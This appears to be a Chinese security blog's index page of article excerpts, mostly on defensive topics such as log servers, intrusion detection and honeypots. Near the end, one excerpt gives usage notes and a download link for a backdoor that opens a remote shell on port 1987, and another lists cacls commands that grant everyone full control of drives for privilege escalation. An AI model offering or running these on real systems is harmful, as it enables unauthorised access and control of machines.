*环境 RedHat 7.3 在网上越来越多的 hacker 的出现, 越来越多的高手出现的情况下.如何才能确保自己可以保存一份完整的 log 呢?稍微有点概念的 hacker 都知道,进入系统后的第一见事情就是去清理log, 而发现入侵的最简单最直接的方法就是去看系统纪录文件.现在我们来说说如何设定一个安全的log服务器. 想想看,如果入侵者无法连接服务器,又如何能改您的 log 呢?现在我们来
- 添加新评论
- 阅读次数:
现今的网络,安全越来越受到大家的重视,在构建网络安全环境时,在技术手段,管理制度等方面都逐步加强,设置防火墙,安装入侵检测系统等等。但网络安全是个全方位的问题,忽略哪一点都会造成木桶效应,使得整个安全系统虚设。本文从分析Web服务器的logging记录来找出漏洞,防范攻击,从而加强Web服务器安全。
Web服务是Internet所提供最多,最丰富的服务,各种Web服务器自然也是受到攻击最多的,我们采用了很多措施来防止遭受攻击和入侵,其中查看Web服务器的记录是最直接,最常用,又比较有效的一种方法,但logging记录很庞大,查看logging记录是很繁琐的事情,如果抓不住重点,攻击线索就容易被忽略。下面就对最流行的两类Web服务器:Apache和IIS做攻击的实验,然后在众多的记录中查到攻击的蛛丝马迹,从而采取适当的措施加强防范。
...- 添加新评论
- 阅读次数:
要想更好的保护网络不受黑客的攻击,就必须对黑客的攻击方法、攻击原理、攻击过程有深入的、详细的了解,只有这样才能更有效、更具有针对性的进行主动防护。下面通过对黑客攻击方法的特征分析,来研究如何对黑客攻击行为进行检测与防御。
一、反攻击技术的核心问题
反攻击技术(入侵检测技术)的核心问题是如何截获所有的网络信息。目前主要是通过两种途径来获取信息,一种是通过网络侦听的途径(如Sniffer,Vpacket等程序)来获取所有的网络信息(数据包信息,网络流量信息、网络状态信息、网络管理信息等),这既是黑客进行攻击的必然途径,也是进行反攻击的必要途径;另一种是通过对操作系统和应用程序的系统日志进行分析,来发现入侵行为和系统潜在的安全漏洞。
...- 添加新评论
- 阅读次数:
信息来源:特络纳
虽然自己电脑有防火墙,但你有没有想过,黑客到底想再你的电脑干些什么?想不想下个圈套来诱捕黑客?
一,什么是"蜜罐"
大家小时候应该听过大人给我讲的狗熊偷蜜的故事吧?要了解电脑安全方面的蜜罐,就得知道两个东西Honeypot和Honeynet.
Honeypot是一种故意存在着缺陷的虚拟系统,用来对黑客进行欺骗,Honeynet是一个很有价值的学习工具,她能使我们了解黑客的入侵的攻击方式.现在知道蜜罐的含义了吧?她是指能吧黑客从你的真是系统中引诱开的诱骗系统,这种系统看起来充满了真实有用的东西,担其实都是为黑客布好的陷阱,说直接的话,就是一个包涵漏洞的系统,她模拟一个或者多个易受攻击的主机给黑客提供易受攻击的目标,让黑客误以为入侵成功,可以为所欲为了.蜜罐主要是用来套住黑客,以便网络保安系统和人员能够将之抓住.
...- 添加新评论
- 阅读次数:
当前随着上网行为管理的趋势逐渐增强,国内涌现了一些大大小的局域网监控软件提供商,局域网网络管理软件提供商的产品品牌、种类增多;作为企事业单位的网络管理员,如何选择局域网网管软件来有效地管理本地的局域网网络行为就成为一个必须解决的问题了。那么选择局域网监控系统主要有那些主要要素呢?
要素一:URL数据库的质量和本土化如何
网页过滤功能是上网行为管理产品的核心之一,也是选购中首先应考虑的要点,因此任何一款上网行为管理产品的URL数据库的好坏是非常重要的;其次应该支持黑白名单过滤功能,便于网络管理员按照自己局域网网络管理的具体需要,对局域网电脑的网址访问进行管理。
...- 添加新评论
- 阅读次数:
最近笔者就遇到了这么一个让人头疼的问题,最终通过 sniffer找到了管理地址信息,下面笔者就为各位呈现忘记管理地址莫慌用sniffer巧解决的全功略。
一,什么时候会忘记管理地址:
忘记管理地址的情况多出现网络管理员交接工作时,老网管离职新网管接手,但是移交时只过多的关注用户名和密码,而没有将各个设备的管理地址写清楚。另外对于一些设备来说可能会因为说明书丢失,而在RESET后忘记管理地址的情况也经常出现。
二,传统获取设备管理地址的方法:
...- 添加新评论
- 阅读次数:
网络安全是指计算机网络系统中的硬件、数据、程序等不会因为无意或恶意的原因而遭到破坏、篡改、泄露,防止非授权的使用或访问,系统能够保持服务的连续性,以及能够可靠的运行。网络安全的具体概念会随着感兴趣角度的不同而不同。
一、网络安全保护技术
1、被动的安全保护技术
目前在网络安全中,被动的安全保护技术主要有物理保护和安全管理、入侵、检测、防火墙、口令验证、审计跟踪、安全扫描器等。下面对它们进行分别介绍。
物理保护和安全管理:它是指制定管理方法和规则对网络中的物理实体和信息系统进行规范管理,从而减少人为因素所带来的不利影响。入侵检测:它是指在网络系统的检查位置执行入侵检测功能的程序,从而可以对系统当前的运行状况和资源进行监控,发现可能的入侵行为。防火墙:它是指在Internet和组织内部网之间实现安全策略的访问控制保护,它的核心思想是采用包过滤技术。口令验证:它是指利用密码检测器的口令验证程序检查口令中的薄弱口令,
...
- 添加新评论
- 阅读次数:
使用说明:
将压缩包内3个文件放在同一目录下,执行vdmallowed.exe后将自动运行shell.EXE,shell.EXE为正向连接
零管道后门程序运行后自动监听1987端口。本地连接远程计算机1987端口,便会得到一个Shell。
下载地址:http://d.namipan.com/d/0c20f9b8b8a4298e90e23fdd3696fb27bc47c78f5ad30000
...
- 添加新评论
- 阅读次数:
• 需求:补丁管理
• 使系统内部软件得到及时更新,系统得到维护
• 自动分发补丁,不需手动操作
解决方案:WSUS
• 帮助企业及时分发补丁,更新软件,保护企业的安全
• 实现远程诊断并解决系统故障
• 管理系统的软硬件资产
• 能为系统资产状况及系统运行状况提供报告(与SQL Server Reporting Service 结合使用)
...- 添加新评论
- 阅读次数:
Cacls提权命令整理:
Cacls的命令参数:
cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览
cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览
cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览
cacls.exe f: /e /t /g everyone:F #把f盘设置
...
- 添加新评论
- 阅读次数: